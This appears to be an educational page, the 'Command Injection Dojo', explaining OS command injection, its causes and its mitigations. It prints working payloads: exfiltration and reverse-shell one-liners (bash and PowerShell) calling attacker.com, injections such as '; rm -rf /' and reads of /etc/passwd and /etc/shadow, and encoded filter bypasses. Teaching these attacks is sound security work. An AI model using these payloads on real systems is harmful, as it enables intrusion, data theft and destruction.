COMMAND INJECTION DOJO

Master the art of system exploitation and defense

1. What is OS Command Injection?

OS Command Injection is a critical vulnerability in which an attacker can execute arbitrary operating system commands on the server that hosts a web application.

Why It's Dangerous:

  • Full server compromise
  • Sensitive data exposure
  • Complete system control
  • Pivoting to internal networks
  • Permanent backdoor installation

// Real-world example:
$email = $_GET['email'];
system("mail -s 'Notification' " . $email);
// Attacker inputs: user@example.com; rm -rf /

2. Vulnerability Requirements

For successful exploitation, these conditions must exist:

Requirement                    | Explanation
-------------------------------|-----------------------------------------------
User input in system commands  | Application passes user input to OS commands
Insufficient input validation  | No proper filtering of command separators
Dangerous functions used       | Direct command execution functions

3. Why Websites Are Vulnerable

Developers introduce this vulnerability through a handful of recurring mistakes.

Common Mistakes:

  1. Using unfiltered user input in system commands
  2. Assuming user input is safe
  3. Using dangerous functions like system(), exec()
  4. Not implementing proper output encoding
  5. Blacklisting instead of allowlisting

// Vulnerable PHP code example:
$user_input = $_GET['ip'];
system("ping " . $user_input);
// Attacker can input: 8.8.8.8; cat /etc/passwd

4. Whitebox Code Review

PHP Dangerous Functions:

system(), exec(), passthru(), shell_exec(),
popen(), proc_open(), backticks (``),
pcntl_exec(), dl()

Python Dangerous Functions:

os.system(), os.popen(), subprocess.call(),
subprocess.Popen(), subprocess.run(),
commands.* (deprecated), eval()

Node.js Dangerous Functions:

child_process.exec(), child_process.execSync(),
child_process.spawn(), child_process.execFile(),
eval(), vm.runInNewContext()

Java Dangerous Classes:

Runtime.exec(), ProcessBuilder,
GroovyShell.evaluate(), ScriptEngine.eval()

5. Exploiting Command Injection

Basic Steps:

  1. Find a parameter that executes system commands, such as:
       * File operations (file=, dir=, path=)
       * Network operations (host=, ip=, server=)
       * System commands (cmd=, command=, exec=)
       * Process controls (kill=, restart=, stop=)
  2. Test with a simple payload: ; whoami
  3. Identify the operating system (Linux/Windows)
  4. Chain commands with separators
  5. Escalate to full system access

6. Advanced Exploitation

Blind Command Injection

When the command output is not returned in the response:

# Time-based detection
; sleep 5

# DNS exfiltration
; nslookup $(whoami).attacker.com

# HTTP exfiltration
; curl http://attacker.com/$(cat /etc/passwd | base64)

Remote Code Execution

# Reverse shell (Linux)
; bash -i >& /dev/tcp/attacker.com/4444 0>&1

# Reverse shell (Windows)
; powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

TTY Tricks

# Spawn interactive shell
; python -c 'import pty; pty.spawn("/bin/bash")'
; script -qc /bin/bash /dev/null

# Upgrade shell
; export TERM=xterm
; stty rows 24 columns 80

7. Filter Bypass Techniques

Filter            | Bypass Technique                 | Payload Example
------------------|----------------------------------|---------------------------------------------
Spaces            | Tabs, ${IFS}, braces             | {cat,/etc/passwd}
Blacklisted words | Environment variables, encoding  | ${PATH:0:1}bin${PATH:0:1}ls
Special chars     | Hex/octal encoding               | \x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64
Command blocks    | Alternative separators           | %0aid (newline)

8. Payload Arsenal

File Read (Linux)

cat /etc/passwd
less /etc/shadow
head -n 10 /var/log/auth.log

System Info (Linux)

uname -a
id
whoami
ps aux

File Read (Windows)

type C:\Windows\win.ini
more C:\boot.ini

System Info (Windows)

whoami
systeminfo
net user
ipconfig /all

9. Mitigation Strategies

Defensive Measures:

  • Input Validation: Strict allowlisting of characters
  • Parameterized APIs: Use subprocess modules safely
  • Sandboxing: Run with least privileges
  • Secure Functions: Prefer safe alternatives
  • Output Encoding: Properly escape output

Secure Coding Examples:

# Python safe example: pass an argv list with shell=False, so no shell ever
# parses the value and separators such as ; or | are just characters
import subprocess
user_input = "8.8.8.8"  # placeholder for the request value, validated first
subprocess.run(['ping', '-c', '4', user_input], shell=False)

// PHP safe example: escapeshellarg() quotes the value as one shell argument;
// it stops separators, not option injection, so validate the value as well
$safe = escapeshellarg($user_input);
system("ping -c 4 " . $safe);
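Why the bypass rows in the filter table above get past a character blacklist, and what the "strict allowlisting" and "parameterized APIs" mitigations look like together, as an added Python example (not code from the original page). The endpoint, the `host` parameter and the hostname regex are assumptions, and the blacklist is a stand-in for the kind of filter the page says to avoid.

```python
"""Allowlist validation vs. the blacklist filtering the page warns against.

Added example, not code from the original page. It assumes a hypothetical
endpoint whose URL-encoded 'host' parameter is handed to ping; the rejected
inputs are constructed from the page's filter-bypass table and simulator.
"""
import ipaddress
import re
import urllib.parse
from typing import List, Optional

# DNS label: letters/digits/hyphens, no leading or trailing hyphen. Because a
# label cannot start with '-', a valid host can never be read as a ping option.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")

# Naive blacklist: blocks the obvious separators but knows nothing about
# ${IFS}, $(...), braces or a URL-encoded newline (%0a), so those payloads pass.
_BLACKLIST = set(";|&` \n")


def blacklist_allows(raw: str) -> bool:
    """Blacklist check on the raw value: True means the filter lets it through."""
    return not any(ch in _BLACKLIST for ch in raw)


def validate_host(raw: str) -> Optional[str]:
    """Return the host if it is a plain IP address or DNS name, otherwise None."""
    value = urllib.parse.unquote(raw).strip()  # decode %0a etc. before checking
    if not value or len(value) > 253:
        return None
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    return value if _HOSTNAME_RE.fullmatch(value) else None


def build_ping_argv(raw: str) -> Optional[List[str]]:
    """argv for subprocess.run(argv, shell=False); None means reject the request."""
    host = validate_host(raw)
    if host is None:
        return None
    # The host is a single argv element, so it is never re-parsed by a shell.
    return ["ping", "-c", "4", host]
```

Run the returned list with `subprocess.run(argv, shell=False)`; a `None` result is a request to reject (and log), not a value to fall back on.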

10. Additional Resources